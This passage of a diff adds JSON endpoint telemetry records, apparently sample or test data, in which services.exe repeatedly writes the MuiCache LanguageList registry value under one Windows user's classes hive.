"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + 
"process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + 
"process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849330000, + "unique_pid": 